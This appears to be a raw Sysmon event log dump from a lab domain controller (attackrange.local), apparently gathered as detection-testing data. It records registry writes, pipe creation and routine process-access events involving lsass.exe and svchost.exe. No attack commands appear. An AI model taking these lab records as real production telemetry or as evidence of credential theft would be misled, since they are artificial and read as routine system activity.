12:00:44.924{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.924{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\rspndr\NdisMajorVersionDWORD (0x00000006) 10341000x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.909{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.909{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.909{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\DriverMajorVersionDWORD (0x00000000) 13241300x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.909{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.909{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\lltdio\NdisMajorVersionDWORD (0x00000006) 13241300x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMinorVersionDWORD (0x00000000) 13241300x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\DriverMajorVersionDWORD (0x0000000a) 13241300x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMinorVersionDWORD (0x0000001e) 13241300x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.893{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\MsLldp\NdisMajorVersionDWORD (0x00000006) 17141700x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.893{266CAFBE-646C-6064-0F00-00000000AE01}1116\Ctx_WinStation_API_serviceC:\Windows\System32\svchost.exe 17141700x80000000000000001226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:44.893{266CAFBE-646C-6064-0F00-00000000AE01}1116\TermSrv_API_serviceC:\Windows\System32\svchost.exe 10341000x80000000000000001225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.893{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.893{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.877{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.877{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.877{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.862{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001219Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.862{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001218Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.862{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001217Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.862{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001216Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.846{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000001215Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x0000001f) 13241300x80000000000000001214Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x0000001f) 13241300x80000000000000001213Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\30UMB\UMB\1&841921d&0&TERMINPUT_BUS 13241300x80000000000000001212Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000001211Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000002) 13241300x80000000000000001210Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:00:44.846{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1UMB\UMB\1&841921d&0&TERMINPUT_BUS 10341000x80000000000000001209Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001208Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001207Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-0E00-00000000AE01}1080C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001206Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.831{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 